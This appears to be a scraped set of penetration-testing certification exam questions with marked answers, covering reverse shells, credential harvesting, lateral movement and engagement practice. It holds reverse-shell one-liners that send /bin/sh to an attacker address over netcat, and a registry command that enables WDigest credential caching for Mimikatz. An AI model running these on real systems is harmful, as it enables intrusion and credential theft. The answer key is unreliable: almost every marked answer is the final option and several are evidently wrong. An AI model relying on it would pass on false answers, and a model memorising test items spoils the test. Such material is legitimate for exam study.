During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO). A. nc 192.168.1.5 44444 B. nc -nlvp 44444 -e /bin/sh C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f D. nc -e /bin/sh 192.168.1.5 44444 E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f D. nc -e /bin/sh 192.168.1.5 44444
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline? A. Discovery scan B. Stealth scan C. Full scan D. Credentialed scan
D. Credentialed scan
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization? A. Sample SOAP messages B. The REST API documentation C. A protocol fuzzing utility D. An applicable XSD file
D. An applicable XSD file
A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network? A. Crack password hashes in /etc/shadow for network authentication. B. Launch dictionary attacks on RDP. C. Conduct a whaling campaign. D. Poison LLMNR and NBNS
D. Poison LLMNR and NBNS
Which of the following actions BEST matches a script kiddieג€™s threat actor? A. Exfiltrate network diagrams to perform lateral movement. B. Steal credit cards from the database and sell them in the deep web. C. Install a rootkit to maintain access to the corporate network. D. Deface the website of a company in search of retribution.
D. Deface the website of a company in search of retribution.
A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend? A. Transition the application to another port. B. Filter port 443 to specific IP addresses. C. Implement a web application firewall. D. Disable unneeded services.
D. Disable unneeded services.
An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organizationג€™s server segment. During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the following actions should the penetration tester take? A. Attempt to use the remnant tools to achieve persistence. B. Document the presence of the left-behind tools in the report and proceed with the test. C. Remove the tools from the affected systems before continuing on with the test. D. Discontinue further testing and report the situation to management.
D. Discontinue further testing and report the situation to management.
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client? A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation. B. Identify the issues that can be remediated most quickly and address them first. C. Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.
A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project? A. Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities. B. Review the firewall configuration, followed by a targeted attack by a read team. C. Perform a discovery scan to identify changes in the network. D. Focus on an objective-based approach to assess network assets with a red team.
D. Focus on an objective-based approach to assess network assets with a red team.
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO). A. Cleartext exposure of SNMP trap data B. Software bugs resident in the IT ticketing system C. S/MIME certificate templates defined by the CA D. Health information communicated over HTTP E. DAR encryption on records servers
D. Health information communicated over HTTP E. DAR encryption on records servers
When performing compliance-based assessments, which of the following is the MOST important key consideration? A. Additional rate B. Company policy C. Impact tolerance D. Industry type
D. Industry type
A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to upload WAR files to the server. Which of the following is the MOST likely post-exploitation step? A. Upload a customized /etc/shadow file. B. Monitor network traffic C. Connect via SSH using default credentials. D. Install web shell on the server.
D. Install web shell on the server.
Which of the following types of intrusion techniques is the use of an ג€under-the-door toolג€ during a physical security assessment an example of? A. Lockpicking B. Egress sensor triggering C. Lock bumping D. Lock bypass
D. Lock bypass
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information? A. MAC address of the client B. MAC address of the domain controller C. MAC address of the web server D. MAC address of the gateway
D. MAC address of the gateway
A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.Which of the following is the BEST explanation for what happened? A. The organization failed to disable Telnet. B. Nmap results contain a false positive for port 23. C. Port 22 was filtered. D. The service is running on a non-standard port.
D. The service is running on a non-standard port.
Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test? A. Penetration test findings often contain company intellectual property B. Penetration test findings could lead to consumer dissatisfaction if made public. C. Penetration test findings are legal documents containing privileged information. D. Penetration test findings can assist an attacker in compromising a system.
D. Penetration test findings can assist an attacker in compromising a system.
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration? A. Obtain staff information by calling the company and using social engineering techniques. B. Visit the client and use impersonation to obtain information from staff. C. Send spoofed emails to staff to see if staff will respond with sensitive information. D. Search the internet for information on staff such as social networking sites.
D. Search the internet for information on staff such as social networking sites.
A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts. Given the findings, which of the following should the consultant recommend be implemented? A. Strong password policy B. Password encryption C. Email system hardening D. Two-factor authentication
D. Two-factor authentication
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement? A. Nikto B. WAR C. W3AF D. Swagger
D. Swagger
D A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is theBEST argument as to why the penetration tester's source IP addresses should be whitelisted? A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems. B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test. C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses. D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the clientג€™s systems? A. The proposed mitigations and remediations in the final report do not include a cost-benefit analysis. B. The NDA protects the consulting firm from future liabilities in the event of a breach. C. The assessment reviewed the cyber key terrain and most critical assets of the clientג€™s network. D. The penetration test is based on the state of the system and its configuration at the time of assessment.
D. The penetration test is based on the state of the system and its configuration at the time of assessment.
A company decides to remediate issues identified from a third-party penetration test done to its infrastructure. Management should instruct the IT team to: A. execute the hot fixes immediately to all vulnerabilities found. B. execute the hot fixes immediately to some vulnerabilities. C. execute the hot fixes during the routine quarterly patching. D. evaluate the vulnerabilities found and execute the hot fixes.
D. evaluate the vulnerabilities found and execute the hot fixes.
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.Which of the following registry changes would allow for credential caching in memory? A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0 B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1 C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1 D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal? A. schtasks.exe /create/tr ג€powershell.exeג€ Sv.ps1 /run B. net session server | dsquery -user | net use c$ C. powershell && set-executionpolicy unrestricted D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
A file contains several hashes. Which of the following can be used in a pass-the-hash attack? A. NTLMv2 B. Kerberos C. NTLMv1 D. LMv2 E. NTLM
E. NTLM
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete after the tester delivers the report? A. Removing shells B. Obtaining client acceptance C. Removing tester-created credentials D. Documenting lessons learned E. Presenting attestation of findings
E. Presenting attestation of findings
